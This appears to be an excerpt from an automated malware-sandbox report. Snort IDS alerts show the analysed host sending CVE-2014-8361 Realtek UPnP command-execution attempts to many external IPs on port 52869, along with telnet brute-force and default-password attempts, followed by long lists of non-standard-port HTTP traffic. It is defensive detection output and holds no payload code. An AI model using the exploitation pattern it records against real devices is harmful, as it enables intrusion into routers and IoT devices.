Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51628 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39502 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53706 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45428 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33780 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49118 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32918
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34730 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:48138
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32918
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48888 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44296 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58534 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58534 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58544 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32974
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38636 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58830 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58120 -> 178.72.106.93:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43234 -> 91.76.197.73:52869

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 42190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59502
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44220 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42792 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46480 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46486 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37900 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36894 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42006 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33852 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
